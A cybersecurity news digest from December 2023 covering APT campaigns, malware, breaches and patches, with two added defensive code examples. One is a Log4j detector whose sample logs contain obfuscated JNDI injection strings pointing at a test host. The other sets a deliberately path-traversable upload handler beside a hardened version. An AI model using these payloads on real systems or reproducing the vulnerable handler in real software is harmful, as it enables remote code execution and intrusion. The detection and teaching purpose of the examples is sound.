The Hacker News

December 12, 2023 – Vulnerabilities

Gamers Warned of Potential CS2 Exploit That can Reveal IP Addresses Full Text

Abstract The exploit, which is an XSS vulnerability, allows players to display GIFs using HTML code blocks in-game. This poses a potential security threat to players, as the exploit can access player IP addresses and potentially execute code on their PCs.

Cyware

December 12, 2023 – Policy and Law

Long-Running Clearview AI Class Action Biometric Privacy Case Settles Full Text

Abstract Clearview AI has reached a settlement in a class-action privacy lawsuit, which alleged that the company violated Illinois' Biometric Information Privacy Act (BIPA) by using online images without consent for its facial recognition technology.

Cyware

December 12, 2023 – Education

Unveiling the Cyber Threats to Healthcare: Beyond the Myths Full Text

Abstract Let's begin with a thought-provoking question: among a credit card number, a social security number, and an Electronic Health Record (EHR), which commands the highest price on a dark web forum? Surprisingly, it's the EHR, and the difference is stark: according to a study, EHRs can sell for up to $1,000 each, compared to a mere $5 for a credit card number and $1 for a social security number. The reason is simple: while a credit card can be canceled, your personal data can't. This significant value disparity underscores why the healthcare industry remains a prime target for cybercriminals. The sector's rich repository of sensitive data presents a lucrative opportunity for profit-driven attackers. For 12 years running, healthcare has faced the highest average costs per breach compared to any other sector. Exceeding an average of $10 million per breach, it surpasses even the financial sector, which incurs an average cost of around $6 million. The severity of this iss

The Hacker News

December 12, 2023 – Phishing

Fake LinkedIn Profiles Target Saudi Workers for Information Leakage and Financial Fraud Full Text

Abstract Researchers have discovered nearly a thousand fake profiles created with the intention of reaching out to companies in the Middle East. These profiles, often difficult to distinguish from real ones, have been successful in their campaigns.

Cyware

December 12, 2023 – APT

Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign Full Text

Abstract The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace. IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said. "ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign." Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania

The Hacker News

December 12, 2023 – General

Security Automation Gains Traction, Prompting a “Shift Everywhere” Philosophy Full Text

Abstract According to Synopsys, the use of automated security technology is on the rise, as organizations increasingly embrace the "shift everywhere" philosophy to improve the effectiveness and reduce the cost of security activities.

Cyware

December 12, 2023 – General

Non-Human Access is the Path of Least Resistance: A 2023 Recap Full Text

Abstract 2023 has seen its fair share of cyber attacks; however, there's one attack vector that proves to be more prominent than others: non-human access. With 11 high-profile attacks in 13 months and an ever-growing ungoverned attack surface, non-human identities are the new perimeter, and 2023 is only the beginning. Why non-human access is a cybercriminal's paradise: People always look for the easiest way to get what they want, and this goes for cybercrime as well. Threat actors look for the path of least resistance, and it seems that in 2023 this path was non-user access credentials (API keys, tokens, service accounts and secrets). "50% of the active access tokens connecting Salesforce and third-party apps are unused. In GitHub and GCP the numbers reach 33%." These non-user access credentials are used to connect apps and resources to other cloud services. What makes them a true hacker's dream is that they have no security measures like user credentials do (MFA, SSO or other IAM pol

The Hacker News

December 12, 2023 – Criminals

Cybercriminals Continue Targeting Open Remote Access Products Full Text

Abstract According to WatchGuard, cybercriminals are still primarily targeting open remote access products and using legitimate remote access tools to hide their malicious activities.

Cyware

December 12, 2023 – Phishing

New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam Full Text

Abstract A phishing campaign has been observed delivering an information stealer malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures. "This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said. "MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions." There is evidence to suggest that Germany is the primary target of the attack as of November 2023, owing to the number of times the downloader URL hosting the payload has been queried. Masquerading as a company looking to book hotel rooms, the phishing email bears a PDF file that, upon opening, activates the infection by prompting the recipient to download an updated version of Adobe Flash. Doing so results in the execution of .NET executables and PowerShell scripts to ultimately run a pernicious Python script, which i

The Hacker News

December 12, 2023 – Attack

Nearly 130,000 Affected by Ransomware Attack on Cold Storage Company Americold Full Text

Abstract The cyberattack resulted in the leak of sensitive data, including names, addresses, Social Security numbers, financial account information, and employment-related health insurance and medical information.

Cyware

December 12, 2023 – Vulnerabilities

Apple Releases Security Updates to Patch Critical iOS and macOS Security Flaws Full Text

Abstract Apple on Monday released security patches for iOS, iPadOS, macOS, tvOS, watchOS, and Safari web browser to address multiple security flaws, in addition to backporting fixes for two recently disclosed zero-days to older devices. This includes updates for 12 security vulnerabilities in iOS and iPadOS spanning AVEVideoEncoder, ExtensionKit, Find My, ImageIO, Kernel, Safari Private Browsing, and WebKit. macOS Sonoma 14.2, for its part, resolves 39 shortcomings, counting six bugs impacting the ncurses library. Notable among the flaws is CVE-2023-45866, a critical security issue in Bluetooth that could allow an attacker in a privileged network position to inject keystrokes by spoofing a keyboard. The vulnerability was disclosed by SkySafe security researcher Marc Newlin last week. It has been remediated in iOS 17.2, iPadOS 17.2, and macOS Sonoma 14.2 with improved checks, the iPhone maker said. Also released by Apple is Safari 17.2, containing fixes for two WebKit flaws – C

The Hacker News

December 12, 2023 – Vulnerabilities

New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now Full Text

Abstract Apache has released a security advisory warning of a critical security flaw in the Struts 2 open-source web application framework that could result in remote code execution. Tracked as CVE-2023-50164, the vulnerability is rooted in flawed "file upload logic" that could enable unauthorized path traversal and could be exploited under certain circumstances to upload a malicious file and achieve execution of arbitrary code. Struts is a Java framework that uses the Model-View-Controller (MVC) architecture for building enterprise-oriented web applications. Steven Seeley of Source Incite has been credited with discovering and reporting the flaw, which impacts the following versions of the software: Struts 2.3.37 (EOL), Struts 2.5.0 through 2.5.32, and Struts 6.0.0 through 6.3.0. Patches for the bug are available in versions 2.5.33 and 6.3.0.2 or greater. There are no workarounds that remediate the issue. "All developers are strongly advised to perform this upgr

The Hacker News

December 11, 2023 – Breach

Australia: University of Wollongong Confirms Data Breach, Notifies Authorities Full Text

Abstract The University of Wollongong has experienced a data breach, with potentially both staff and students affected. The breach has been detected and contained, and investigations are underway to determine the scope of the breach.

Cyware

December 11, 2023 – APT

Researchers Unmask Sandman APT’s Hidden Link to China-Based KEYPLUG Backdoor Full Text

Abstract Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG. The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit in the same victim networks. Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively. "Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions," the companies said in a report shared with The Hacker News. "The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."

The Hacker News

December 11, 2023 – Business

Opal Security, Which Helps Companies Manage Access and Identities, Raises $22M Full Text

Abstract Identity management solution provider Opal Security has managed to raise $22 million in a Series B round to expand its team and develop new AI-powered tools for identity and access risk remediation.

Cyware

December 11, 2023 – Attack

Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans Full Text

Abstract The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader. The cybersecurity firm described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella. "Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, As

The Hacker News
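The Log4j exploitation that opens the Operation Blacksmith campaign above arrives as a JNDI lookup string (the `${jndi:...}` syntax of the Log4Shell lookup feature) in some logged request field, and in practice it is wrapped in nested lookups to defeat naive string matching. The detector below is an added example written for this page, not Talos's detection content: it normalizes the common nesting forms before matching, and the web-server log lines, hosts and obfuscation variants are constructed. It flags the injection attempt, not the implants that follow.

```python
"""Detect Log4j JNDI lookup attempts in log lines, including nested-lookup obfuscation."""
import re

# ${lower:x} / ${upper:x} -> x ; ${name:-x} and ${::-x} (default-value syntax) -> x
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# Scheme list is an assumption covering the usual JNDI providers seen in attempts.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def normalize(s, max_rounds=10):
    """Collapse nested lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        new = _CASE_RE.sub(lambda m: m.group(1), s)
        new = _DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def is_jndi_attempt(line):
    return JNDI_RE.search(normalize(line)) is not None


# Constructed access-log lines (RFC 5737 test addresses; not captured traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2023:10:01:02 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200',
    '10.0.0.5 - - [11/Dec/2023:10:01:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.9/b}"',
    '10.0.0.5 - - [11/Dec/2023:10:01:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/c}"',
    '10.0.0.5 - - [11/Dec/2023:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${env:NOPE:-j}ndi:dns://203.0.113.9/d}"',
    '10.0.0.6 - - [11/Dec/2023:10:02:00 +0000] "GET /docs/${version} HTTP/1.1" 200',
    '10.0.0.7 - - [11/Dec/2023:10:03:00 +0000] "GET /search?q=jndi+tutorial HTTP/1.1" 200',
]


def scan(lines):
    """Return only the lines that carry a JNDI lookup after de-obfuscation."""
    return [line for line in lines if is_jndi_attempt(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("JNDI attempt:", hit)
```

The normalization step is what distinguishes this from a plain `${jndi:` grep: the second, third and fourth sample lines contain no such substring until the nested lookups are resolved. Point `scan()` at the raw User-Agent, query string and header fields, since any logged field can be the injection point.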

December 11, 2023 – Vulnerabilities

Apache Fixed Critical RCE Flaw CVE-2023-50164 in Struts 2 Full Text

Abstract The Apache Software Foundation has released security updates to address a critical file upload vulnerability in the Struts 2 framework, which could allow for remote code execution.

Cyware
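Both Struts 2 items above (the THN write-up and this Cyware summary) describe the same bug class: file upload code that lets a client-supplied name steer where the file is written, so a traversal sequence lands a file outside the upload directory. The functions below are an added example written for this page in Python; they are not the Struts code and do not reproduce the specific CVE-2023-50164 trigger. The upload root, the file names and the traversal string are constructed for the demonstration.

```python
"""Path traversal in upload handling: the trusting version beside a hardened one."""
import os
import tempfile
from pathlib import Path


def save_upload_vulnerable(upload_root, client_name, data):
    """Joins the client-supplied name straight onto the root, so '../' climbs out."""
    dest = os.path.join(upload_root, client_name)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return os.path.abspath(dest)


def save_upload_safe(upload_root, client_name, data):
    """Reject any directory component, then verify the resolved destination is a
    direct child of the resolved root (resolve() also defeats symlink tricks)."""
    root = Path(upload_root).resolve()
    base = os.path.basename(client_name.replace("\\", "/"))
    if base in ("", ".", "..") or base != client_name:
        raise ValueError(f"rejected file name: {client_name!r}")
    dest = (root / base).resolve()
    if dest.parent != root:
        raise ValueError(f"path escapes upload root: {client_name!r}")
    dest.write_bytes(data)
    return str(dest)


def demo():
    """Run both versions in a throwaway directory; reports where each file ended up."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "uploads")
        os.makedirs(root)
        evil = "../webapps/ROOT/upload.jsp"      # constructed traversal name
        escaped = save_upload_vulnerable(root, evil, b"x")
        outside = not escaped.startswith(os.path.abspath(root) + os.sep)
        try:
            save_upload_safe(root, evil, b"x")
            blocked = False
        except ValueError:
            blocked = True
        kept = save_upload_safe(root, "report.pdf", b"%PDF")
        inside = kept.startswith(str(Path(root).resolve()) + os.sep)
        return {"vulnerable_escaped": outside, "safe_blocked": blocked, "safe_inside": inside}


if __name__ == "__main__":
    print(demo())
```

The second check in `save_upload_safe` is the one to keep even if the name filter changes: comparing the resolved parent to the resolved root catches anything the basename rule missed, including names that only become traversals after decoding or normalization elsewhere in the stack.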

December 11, 2023 – Education

Playbook: Your First 100 Days as a vCISO - 5 Steps to Success Full Text

Abstract In an increasingly digital world, no organization is spared from cyber threats. Yet, not every organization has the luxury of hiring a full-time, in-house CISO. This gap in cybersecurity leadership is where you, as a vCISO, come in. You are the person who will establish, develop, and solidify the organization's cybersecurity infrastructure, blending strategic guidance with actionable cybersecurity services. As an organizational leader, you will be required to navigate professional duties, business needs, diverse organizational personas and leadership demands. Your success relies on your ability to build trust and establish yourself as a strategic decision-maker who can protect the organization. As such, your first 100 days in a new organization are key to your success. They will lay the groundwork for your long-term achievements. To aid you in this critical phase, we introduce a comprehensive guide: a five-step, 100-day action plan, "Your First 100 Days as a vCISO - 5

The Hacker News

December 11, 2023 – Malware

GULOADER Adds New Anti-Analysis Tactic to Arsenal Full Text

Abstract Researchers have identified new techniques employed by the GuLoader malware to enhance its evasion capabilities and make analysis more challenging. The highly evasive shellcode downloader malware was found leveraging Vectored Exception Handler (VEH) capability. Organizations can leverage the late ...

Cyware

December 11, 2023 – Malware

SpyLoan Scandal: 18 Malicious Loan Apps Defraud Millions of Android Users Full Text

Abstract Cybersecurity researchers have discovered 18 malicious loan apps for Android on the Google Play Store that have been collectively downloaded over 12 million times. "Despite their attractive appearance, these services are in fact designed to defraud users by offering them high-interest-rate loans endorsed with deceitful descriptions, all while collecting their victims' personal and financial information to blackmail them, and in the end gain their funds," ESET said. The Slovak cybersecurity company is tracking these apps under the name SpyLoan, noting they are designed to target potential borrowers located in Southeast Asia, Africa, and Latin America. The list of apps, which have now been taken down by Google, is below: AA Kredit: इंस्टेंट लोन ऐप (com.aa.kredit.android); Amor Cash: Préstamos Sin Buró (com.amorcash.credito.prestamo); Oro Préstamo - Efectivo rápido (com.app.lo.go); Cashwow (com.cashwow.cow.eg); CrediBus Préstamos de crédito (com.dinero.profin.pr

The Hacker News

December 11, 2023 – Government

CISA and ENISA Signed a Working Arrangement to Enhance Cooperation Full Text

Abstract The collaboration aims to strengthen cybersecurity, safeguard critical infrastructure, and reinforce the resilience of digital products in the face of increasing cyber threats.

Cyware

December 11, 2023 – Education

Webinar — Psychology of Social Engineering: Decoding the Mind of a Cyber Attacker Full Text

Abstract In the ever-evolving cybersecurity landscape, one method stands out for its chilling effectiveness – social engineering. But why does it work so well? The answer lies in the intricate dance between the attacker's mind and human psychology. Our upcoming webinar, "Think Like a Hacker, Defend Like a Pro," highlights this alarming trend. We delve deep into social engineering, exploring its roots in human psychology and why it remains a formidable weapon in the cyber attacker's arsenal. What Will You Learn? Understanding Social Engineering: An in-depth look at the evolution and continued effectiveness of social engineering in cyberattacks. Human Psychology in Cybersecurity: Insights into how social engineers twist psychological principles for nefarious purposes. Tactical Awareness: Learn to identify both used and unused tactics by social engineers, and understand the misinformation leveraged in their campaigns. Strategic Defense: Arm yourself with the knowl

The Hacker News

December 11, 2023 – Policy and Law

UK Sanctions Nine Linked to Cyber Trafficking in Southeast Asia Full Text

Abstract The United Kingdom has imposed sanctions on individuals and entities involved in Southeast Asia's online scamming industry, targeting both human traffickers and companies connected to scam operations.

Cyware

December 11, 2023 – Malware

New PoolParty Process Injection Techniques Outsmart Top EDR Solutions Full Text

Abstract A new collection of eight process injection techniques, collectively dubbed  PoolParty , could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems. SafeBreach researcher Alon Leviev  said  the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques." The  findings  were first presented at the  Black Hat Europe 2023  conference last week. Process injection refers to an  evasion technique  used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging. PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system. I

The Hacker News

December 9, 2023 – Vulnerabilities

Researchers Automated Jailbreaking of LLMs With Other LLMs Full Text

Abstract Researchers have developed an automated machine learning technique, called TAP, that can quickly exploit vulnerabilities in large language models (LLMs) and make them produce harmful and toxic responses.

Cyware

December 09, 2023 – Vulnerabilities

SLAM Attack: New Spectre-based Vulnerability Impacts Intel, AMD, and Arm CPUs Full Text

Abstract Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called  SLAM  that could be exploited to leak sensitive information from kernel memory on current and upcoming CPUs from Intel, AMD, and Arm. The attack is an end-to-end exploit for Spectre based on a new feature in Intel CPUs called  Linear Address Masking  ( LAM ) as well as its analogous counterparts from AMD (called  Upper Address Ignore  or  UAI ) and Arm (called  Top Byte Ignore  or  TBI ). "SLAM exploits unmasked gadgets to let a userland process leak arbitrary ASCII kernel data," VUSec researchers  said , adding it could be leveraged to leak the root password hash within minutes from kernel memory. While LAM is presented as a security feature, the study found that it ironically degrades security and "dramatically" increases the  Spectre attack surface , resulting in a transient execution attack, which exploits  speculative execution  to extract sensitive data via

The Hacker News

December 9, 2023 – Malware

Bypassing Major EDRs Using Pool Party Process Injection Techniques Full Text

Abstract The technique utilizes Windows thread pools and includes a chain of three primitives for memory allocation, writing malicious code, and executing it, making it more flexible than existing process injection techniques.

Cyware

December 09, 2023 – Malware

Researchers Unveil GuLoader Malware’s Latest Anti-Analysis Techniques Full Text

Abstract Threat hunters have unmasked the latest tricks adopted by a malware strain called  GuLoader  in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic  said  in a report published this week. First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions. A  steady stream  of  open-source reporting  into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented fe

The Hacker News

December 9, 2023 – Attack

Central Virginia Transit System Affected by Cyber Incident Full Text

Abstract The Greater Richmond Transit Company (GRTC) experienced a cyberattack over the Thanksgiving holiday, resulting in a temporary disruption to their computer network. The Play ransomware gang has claimed responsibility for the attack.

Cyware

December 9, 2023 – Attack

Hackers Hit Erris Water in Stance Over Israel Full Text

Abstract Cybercriminals targeted a private group water scheme in the Erris area, causing disruption to 180 homeowners and highlighting the vulnerability of critical infrastructure to politically motivated cyber-attacks.

Cyware

December 9, 2023 – Breach

Android Barcode Scanner App Exposes User Passwords Full Text

Abstract The Android app Barcode to Sheet, with over 100k downloads, has left sensitive user data exposed due to an open instance, including plaintext enterprise data and weakly hashed passwords.

Cyware

December 8, 2023 – Government

FCC Partners With Four States on Privacy and Data Protection Enforcement Full Text

Abstract By collaborating with state enforcers, the FCC can enhance its investigative efforts, share information, and leverage tools to address consumer harms more effectively in the realm of privacy and cybersecurity.

Cyware

December 08, 2023 – Vulnerabilities

New 5G Modems Flaws Affect iOS Devices and Android Models from Major Brands Full Text

Abstract A collection of security flaws in the firmware implementation of 5G mobile network modems from major chipset vendors such as MediaTek and Qualcomm impact USB and IoT modems as well as hundreds of smartphone models running Android and iOS. Of the 14 flaws – collectively called  5Ghoul  (a combination of "5G" and "Ghoul") – 10 affect 5G modems from the two companies, out of which three have been classified as high-severity vulnerabilities. "5Ghoul vulnerabilities may be exploited to continuously launch attacks to drop the connections, freeze the connection that involve manual reboot or downgrade the 5G connectivity to 4G," the researchers  said  in a study published today. As many as 714 smartphones from 24 brands are impacted, including those from Vivo, Xiaomi, OPPO, Samsung, Honor, Motorola, realme, OnePlus, Huawei, ZTE, Asus, Sony, Meizu, Nokia, Apple, and Google. The vulnerabilities were disclosed by a team of researchers from the ASSET (Automated

The Hacker News

December 8, 2023 – Breach

Update: Records Reveal New Information About Sweetwater Union High School District Data Breach Full Text

Abstract New records obtained through a public records request reveal that over 22,000 people were affected by a data breach at the Sweetwater Union High School District in California.

Cyware

December 08, 2023 – Attack

N. Korean Kimsuky Targeting South Korean Research Institutes with Backdoor Attacks Full Text

Abstract The North Korean threat actor known as  Kimsuky  has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems. "The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC)  said  in an analysis posted last week. The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document. The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor. The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server. It's also capable of

The Hacker News

December 8, 2023 – Breach

Shoe Retailer Aldo Says LockBit Posting Is Related to System at Franchise Partner Full Text

Abstract The affected data was limited to information related to the franchise partner's operations in a specific overseas territory and did not include any financial or payment card information.

Cyware

December 08, 2023 – Ransomware

Ransomware-as-a-Service: The Growing Threat You Can’t Ignore Full Text

Abstract Ransomware attacks  have become a significant and pervasive threat in the ever-evolving realm of cybersecurity. Among the various iterations of ransomware, one trend that has gained prominence is Ransomware-as-a-Service (RaaS). This alarming development has transformed the cybercrime landscape, enabling individuals with limited technical expertise to carry out devastating attacks. Traditional and double extortion ransomware attacks Traditionally, ransomware refers to a type of malware that encrypts the victim's files, effectively blocking access to data and applications until a ransom is paid to the attacker. However, more contemporary attackers often employ an additional strategy. The bad actors create copies of the compromised data and leverage the threat of publishing sensitive information online unless their demands for ransom are met. This dual approach adds an extra layer of complexity and potential harm to the victims. A new model for ransomware RaaS is the latest busin

The Hacker News

December 8, 2023 – General

Ransomware, Vendor Hacks Push Breach Number to Record High Full Text

Abstract Data breaches in the U.S. have reached an all-time high, with 2.6 billion personal records compromised in the past two years, driven by aggressive ransomware attacks and breaches targeting third-party vendors.

Cyware

December 08, 2023 – Malware

Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software Full Text

Abstract Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new  Trojan-Proxy  malware. "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan  said . The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools. The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign. Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered

The Hacker News

December 8, 2023 – Vulnerabilities

Novel ‘DDSpoof’ Attacks Abuse Microsoft DHCP Servers to Spoof DNS Records Full Text

Abstract The default configuration of Microsoft Dynamic Host Configuration Protocol (DHCP) servers leaves a significant number of organizations vulnerable to these attacks, making them accessible to a wide range of attackers.

Cyware

December 08, 2023 – Vulnerabilities

WordPress Releases Update 6.4.2 to Address Critical Remote Attack Vulnerability Full Text

Abstract WordPress has released version 6.4.2 with a patch for a critical security flaw that could be exploited by threat actors by combining it with another bug to execute arbitrary PHP code on vulnerable sites. "A remote code execution vulnerability that is not directly exploitable in core; however, the security team feels that there is a potential for high severity when combined with some plugins, especially in multisite installations," WordPress said. According to WordPress security company Wordfence, the issue is rooted in the WP_HTML_Token class that was introduced in version 6.4 to improve HTML parsing in the block editor. A threat actor with the ability to exploit a PHP object injection vulnerability present in any other plugin or theme could chain the two issues to execute arbitrary code and seize control of the targeted site. "If a POP [property-oriented programming] chain is present via an additional plugin or theme installed on the target system, it could all

The Hacker News

December 8, 2023 – Business

ProvenRun Raises $16.2M in Series A Funding Full Text

Abstract The round was led by Tikehau Capital, through its new vintage of Brienne, its flagship private equity cybersecurity strategy with the French Ministry of Defence’s Definvest fund, managed by Bpifrance.

Cyware

December 08, 2023 – Policy and Law

Founder of Bitzlato Cryptocurrency Exchange Pleads Guilty in Money-Laundering Scheme Full Text

Abstract The Russian founder of the now-defunct Bitzlato cryptocurrency exchange has pleaded guilty, nearly 11 months after he was  arrested in Miami  earlier this year. Anatoly Legkodymov (aka Anatolii Legkodymov, Gandalf, and Tolik), according to the U.S. Justice Department, admitted to operating an unlicensed money-transmitting business that enabled other criminal actors to launder their illicit proceeds. He faces up to five years in prison. "Legkodymov operated a cryptocurrency exchange that was open for business to money launderers and other criminals,"  said  Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department's Criminal Division. "He profited from catering to criminals, and now he must pay the price. Transacting in cryptocurrency does not put you beyond the reach of the law." Bitzlato, which served as a safe haven for fraudsters and ransomware crews such as  Conti , is estimated to have received $2.5 billion in cryptocurrency bet

The Hacker News

December 8, 2023 – Malware

New Variants of HeadCrab Malware Commandeer Thousands of Servers Full Text

Abstract The HeadCrab malware has resurfaced with a new variant that allows root access to Redis servers, infecting over 1,100 servers and enabling the attacker to control and modify responses.

Cyware

December 7, 2023 – Vulnerabilities

Google Pushes Yet Another Security Update to Its Chrome Browser Full Text

Abstract Chrome version 120 includes 10 bug fixes, with two of them being highly critical security patches. The high-ranked security vulnerabilities include "Use after free" exploits in Media Stream and Side Panel Search.

Cyware

December 07, 2023 – Hacker

Microsoft Warns of COLDRIVER’s Evolving Evading and Credential-Stealing Tactics Full Text

Abstract The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interest to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446. The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said. Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017. In August 2023, Recorded Future

The Hacker News

December 7, 2023 – Vulnerabilities

Dangerous Vulnerability in Fleet Management Software Seemingly Ignored by Vendor Full Text

Abstract The vulnerability, which impacts the Syrus4 IoT gateway made by Digital Communications Technologies (DCT), gives hackers access to the software and commands used to manage thousands of vehicles.

Cyware

December 07, 2023 – Vulnerabilities

New Bluetooth Flaw Let Hackers Take Over Android, Linux, macOS, and iOS Devices Full Text

Abstract A critical Bluetooth security flaw could be exploited by threat actors to take control of Android, Linux, macOS and iOS devices. Tracked as  CVE-2023-45866 , the issue relates to a case of authentication bypass that enables attackers to connect to susceptible devices and inject keystrokes to achieve code execution as the victim. "Multiple Bluetooth stacks have authentication bypass vulnerabilities that permit an attacker to connect to a discoverable host without user confirmation and inject keystrokes," said security researcher  Marc Newlin , who  disclosed  the flaws to the software vendors in August 2023. Specifically, the attack deceives the target device into thinking that it's connected to a Bluetooth keyboard by taking advantage of an "unauthenticated pairing mechanism" that's defined in the Bluetooth specification. Successful exploitation of the flaw could permit an adversary in close physical proximity to connect to a vulnerable device and trans

The Hacker News

December 7, 2023 – Breach

Groveport Madison School District Servers Hacked by Ransomware Group Full Text

Abstract The BlackSuit ransomware group was able to hack into two servers belonging to the school district, impacting Windows devices, file services, printers, and copiers. Phones were not impacted.

Cyware

December 07, 2023 – Education

Hacking the Human Mind: Exploiting Vulnerabilities in the ‘First Line of Cyber Defense’ Full Text

Abstract Humans are complex beings with consciousness, emotions, and the capacity to act based on thoughts. In the ever-evolving realm of cybersecurity, humans consistently remain primary targets for attackers. Over the years, these attackers have developed their expertise in exploiting various human qualities, sharpening their skills to manipulate biases and emotional triggers with the objective of influencing human behaviour to compromise security, whether personal or organisational. More than just a 'human factor' Understanding what defines our humanity, recognizing how our qualities can be perceived as vulnerabilities, and comprehending how our minds can be targeted provide the foundation for identifying and responding when we inevitably become the target. The human mind is a complex landscape that evolved over years of exposure to the natural environment, interactions with others, and lessons drawn from past experiences. As humans, our minds set us apart, marke

The Hacker News

December 7, 2023 – Breach

Millions of Patient Scans and Health Records Spilling Online Thanks to Decades-Old DICOM Bug Full Text

Abstract Over 3,800 PACS servers across 110 countries are unintentionally exposing the private data of 16 million patients, including names, addresses, and even Social Security numbers.

Cyware

December 07, 2023 – Education

Building a Robust Threat Intelligence with Wazuh Full Text

